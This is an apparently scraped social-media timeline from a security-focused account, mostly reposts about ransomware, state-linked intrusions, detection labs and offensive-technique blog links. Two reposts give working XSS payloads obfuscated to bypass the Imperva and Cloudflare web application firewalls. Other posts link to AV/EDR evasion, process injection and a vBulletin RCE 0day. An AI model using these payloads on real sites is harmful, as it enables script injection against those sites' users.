DriftlessTech's profile picture.

Хаски Хакер

@DriftlessTech

Pinned

client: KNOCK KNOCK server:WHO'S THERE? client:SSH2_MSG_USERAUTH_SUCCESS


Хаски Хакер reposted

holy fuck there's a list of victims too

AzakaSekai_'s tweet image. holy fuck there's a list of victims too

Хаски Хакер reposted

Today the Belarusian Cyber-Partisons group (@cpartisans) staged a cyber attack against the Belarusian railway infrastructure, designed to halt Russian military movements. Trains stopped in Minsk, Orsha, and Osipovichi The railway system uses Windows XP. Image via @cpartisans.

vxunderground's tweet image. Today the Belarusian Cyber-Partisons group (@cpartisans) staged a cyber attack against the Belarusian railway infrastructure, designed to halt Russian military movements. Trains stopped in Minsk, Orsha, and Osipovichi

The railway system uses Windows XP. 
Image via @cpartisans.

Хаски Хакер reposted

A China-aligned espionage group, dubbed “LightBasin” by CrowdStrike, UNC1945, has targeted the telecommunications sector and new research has identified 13 telecommunications companies as having been compromised dating back to least 2019. cyberscoop.com/a-china-aligne… @CyberScoopNews


Хаски Хакер reposted

Here's what it looks like when ransomware attacks victimize rural communities: therecord.media/when-ransomwar…


Trickbot is so hot right now.


Prevent #Wastedlocker ransomware from running by blocking psexec and psexesvc from invoking untrusted processes.


Хаски Хакер reposted

New project — Active Directory detection labs in Azure! github.com/christophetd/A… Comes with Sysmon, WEF, Windows 10 workstations, ready-to-query Kibana+ES instance 1) terraform apply 2) ??? 3) profit Detailed write-up: blog.christophetd.fr/automating-the…

christophetd's tweet image. New project — Active Directory detection labs in Azure!

github.com/christophetd/A…

Comes with Sysmon, WEF, Windows 10 workstations, ready-to-query Kibana+ES instance

1) terraform apply
2) ???
3) profit

Detailed write-up: blog.christophetd.fr/automating-the…
christophetd's tweet image. New project — Active Directory detection labs in Azure!

github.com/christophetd/A…

Comes with Sysmon, WEF, Windows 10 workstations, ready-to-query Kibana+ES instance

1) terraform apply
2) ???
3) profit

Detailed write-up: blog.christophetd.fr/automating-the…
christophetd's tweet image. New project — Active Directory detection labs in Azure!

github.com/christophetd/A…

Comes with Sysmon, WEF, Windows 10 workstations, ready-to-query Kibana+ES instance

1) terraform apply
2) ???
3) profit

Detailed write-up: blog.christophetd.fr/automating-the…
christophetd's tweet image. New project — Active Directory detection labs in Azure!

github.com/christophetd/A…

Comes with Sysmon, WEF, Windows 10 workstations, ready-to-query Kibana+ES instance

1) terraform apply
2) ???
3) profit

Detailed write-up: blog.christophetd.fr/automating-the…

Хаски Хакер reposted

Imperva WAF Bypass for XSS; <details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"> - without parentheses, 'alert', 'document.domain' , 'window' , space #BugBounty #BugBountyTip #WAF #infosec 🐾


Gonna have to check this one out

Introducing SysWhispers, a tool that helps with AV/EDR evasion by using direct system calls to bypass user-mode API hooks. It works by generating header/ASM pairs supporting all core syscalls from Windows XP to 10. Check it out here with examples: github.com/jthuraisamy/Sy…



About damn time.

“As of this morning, OpenSSH now has experimental U2F/FIDO support” marc.info/?l=openssh-uni…



Хаски Хакер reposted

A very short blog post for all of you that cannot let go of Task Scheduler as a persistence technique: a12d404.net/windows/2019/1…


Хаски Хакер reposted

A quick note on Injecting Portable Executables to Remote Processes ired.team/offensive-secu…


Хаски Хакер reposted

2019-10-29: 🚀#Buran Delphi #Ransomware v5🕑 Whitelisted Files, Folders | Extensions 🤔"we do not work with tech-illiterate & folks far from topic (as well as too emotionally unstable but victims pay we can tolerate)" MD5: 4134205a920e9a3b172f2093a6844486 h/t @malwrhunterteam

VK_Intel's tweet image. 2019-10-29: 🚀#Buran Delphi #Ransomware v5🕑
Whitelisted Files, Folders | Extensions 
🤔&quot;we do not work with tech-illiterate &amp;amp; folks far from topic (as well as too emotionally unstable but victims pay we can tolerate)&quot;
MD5: 4134205a920e9a3b172f2093a6844486 
h/t @malwrhunterteam
VK_Intel's tweet image. 2019-10-29: 🚀#Buran Delphi #Ransomware v5🕑
Whitelisted Files, Folders | Extensions 
🤔&quot;we do not work with tech-illiterate &amp;amp; folks far from topic (as well as too emotionally unstable but victims pay we can tolerate)&quot;
MD5: 4134205a920e9a3b172f2093a6844486 
h/t @malwrhunterteam

Хаски Хакер reposted

Check out the Modern Wireless Attacks series from @s0lst1c3. Part 1 is being released today, which introduces some fundamentals along with demonstration of the Evil Twin and Karma attacks with EAPHammer. posts.specterops.io/modern-wireles…


Where do I buy. Take my money Copvpn.

New VPN service coming soon: CopVPN. It automatically creates full audit logs of all illegal activities from your account and sends them to the correct local or federal agency. Yes of course we accept Bitcoin! Make sure to tumble it lmao.



Хаски Хакер reposted

cloudflare `XSS´ success, red dot. 🎃 « <svg onload\r\n=$.globalEval("al"+"ert()");> » « <svg/onload=self[`aler`%2b`t`]`1`> » #BugBounty #BugBountyTip #WAF #infosec


Хаски Хакер reposted

lol vBulletin 5.x RCE 0day. Tested and works. seclists.org/fulldisclosure…

notdan's tweet image. lol vBulletin 5.x RCE 0day. Tested and works. 
seclists.org/fulldisclosure…

Хаски Хакер reposted

OMG people, RSA is cracked!!1! 😮😮😮 😂 Okay, so someone should tell these "emerging computer scientists" that people done this long before... And not only for 256... Even there were ransomware families that could be cracked thanks to not using proper RSA... cc @demonslay335

malwrhunterteam's tweet image. OMG people, RSA is cracked!!1!
😮😮😮
😂
Okay, so someone should tell these &quot;emerging computer scientists&quot; that people done this long before... And not only for 256... Even there were ransomware families that could be cracked thanks to not using proper RSA...
cc @demonslay335

Someone has your global address book and intentionally locks out all users on your domain through bad password spraying. What do you do?


United States Trends

Loading...

Something went wrong.


Something went wrong.